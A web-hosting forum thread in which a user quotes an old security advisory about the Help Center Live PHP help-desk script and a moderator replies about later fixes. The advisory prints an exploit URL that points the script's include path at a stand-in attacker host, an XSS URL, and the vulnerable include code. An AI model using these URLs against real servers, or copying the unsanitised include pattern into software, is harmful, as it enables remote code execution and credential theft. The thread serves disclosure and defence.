Vodahost or Navaldesign - Fantastico

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts
  • davidundalicia
    General

    • Mar 2006
    • 6294

    Vodahost or Navaldesign - Fantastico

    Hi, I have just been trying out help centre live
    from fantastico
    and I came across this on the web....Has this been fixed or should we just dump it ?
    I know its an old report, but I am still wary of continuing with this product !!

    Thanks............................................ ...

    Critical Vulnerability In Help Center Live
    December 24, 2004

    Vendor : Michael Bird
    URL : http://www.helpcenterlive.com/
    Version : All Versions
    Risk : Multiple Vulnerabilities


    Description:
    Help Center Live is a `Live` help desk system written in PHP using a MySql database backend that features Live Support, Trouble Tickets and FAQ within one project. This is a very popular application, especially with webhosts and other services.


    Cross Site Scripting:
    Cross site scripting exists in Help Center Live. This vulnerability exists due to user supplied input not being checked properly. Below is an example.

    http://path/faq/index.php?find=[CODEGOESHERE]&search=Search

    This vulnerability could be used to steal cookie based authentication credentials within the scope of the current domain, or render hostile code in a victim's browser.


    File Include Vulnerability:
    There lies a very dangerous file include vulnerability in help Center Live. An attacker can run system commands with the rights of the webserver by including a malicious file

    http://path/inc/pipe.php?HCL_path=http://attacker

    All an attacker has to do is include any malicious php code and it will be executed. Here is the vulnerable code, it is located in inc/pipe.php



    $decodemessage = $HCL_path . "/inc/DecodeMessage.inc";
    include($decodemessage);


    Since we call the pipe.php file directly we can now include a file as long as register globals is turned on in the php configuration settings. There is a similar in skin.php, this could be used in some circumstances to gain access to arbitrary local files and possibly more.



    // Get a default inner if no inner is specified
    if (!isset($SKIN_inner)) {
    $SKIN_inner = "default";
    }

    // Get the skins
    $file = $HCL_path."/inc/skins/".$SKIN_name."/".$SKIN_type.".hcl";
    $handle = fopen($file, "rb");
    $SKIN_output_file = fread($handle, filesize($file));
    fclose($handle);
    blah_inner_default.hcl
    $file = $HCL_path."/inc/skins/".$SKIN_name."/".$SKIN_type."_inner_".$SKIN_inner.".hcl";
    $handle = fopen($file, "rb");
    $SKIN_output_inner = fread($handle, filesize($file));
    fclose($handle);



    Solution:
    I have contacted the developer, but received no answer. My advice would be for any users running help center live to deny direct access to the /inc/ directory, as it is not needed. This can be accomplished in apache web server by configuring a .htaccess file to effectively "deny from all" and restrict access to the directory containing the vulnerable files.


    Credits:
    James Bercegay of the GulfTech Security Research Team
    Have fun
    Regards..... David

    Step by Step Visual Tutorials for the complete beginner
    Newbies / Beginners Forum
    FREE Membership Login Scripts: - Meta Tags Analyzer
    My Social Networking Site - Free Contact Forms
    Finished your New website!! Now get it noticed Here:
  • navaldesign
    General & Forum Moderator

    • Oct 2005
    • 12080

    #2
    Re: Vodahost or Navaldesign - Fantastico

    I have only used Help Center Live aprox a year ago. At that time, issues with the php version and settings would not allow correct functioning of the script, so i simply abbandoned it. Sorry David, i cannot answer you.
    Navaldesign
    Logger Lite: Low Cost, Customizable, multifeatured Login script
    Instant Download Cart: a Powerfull, Customized, in site, DB driven, e-products Cart
    DBTechnosystems.com Forms, Databases, Shopping Carts, Instant Download Carts, Loggin Systems and more....
    Advanced BlueVoda Form Processor : No coding form processor! Just install and use! Now with built in CAPTCHA!

    Comment

    • davidundalicia
      General

      • Mar 2006
      • 6294

      #3
      Re: Vodahost or Navaldesign - Fantastico

      Thanks for your quick reply George.

      It seems to work OK, but I am loathe to use it if it is still a security risk.

      What about the use of a htaccess file that was mentioned?
      How would this be implemented ?

      Thanks again.


      I will await a reply from *****....................
      Have fun
      Regards..... David

      Step by Step Visual Tutorials for the complete beginner
      Newbies / Beginners Forum
      FREE Membership Login Scripts: - Meta Tags Analyzer
      My Social Networking Site - Free Contact Forms
      Finished your New website!! Now get it noticed Here:

      Comment

      • navaldesign
        General & Forum Moderator

        • Oct 2005
        • 12080

        #4
        Re: Vodahost or Navaldesign - Fantastico

        Found this on the net:

        Description:
        Some vulnerabilities have been reported in Help Center Live, which can be exploited by malicious people to conduct SQL injection attacks.

        Input passed to unspecified parameters in the "osTicket" module isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

        Solution:
        Update to version 2.1.0.
        http://sourceforge.net/project/showfiles.php?group_id=93857

        Since Fantastico has v. 2.1.2 i suppose it is ok.



        Security Focus also seems to share the same opinion:

        Navaldesign
        Logger Lite: Low Cost, Customizable, multifeatured Login script
        Instant Download Cart: a Powerfull, Customized, in site, DB driven, e-products Cart
        DBTechnosystems.com Forms, Databases, Shopping Carts, Instant Download Carts, Loggin Systems and more....
        Advanced BlueVoda Form Processor : No coding form processor! Just install and use! Now with built in CAPTCHA!

        Comment

        Working...
        X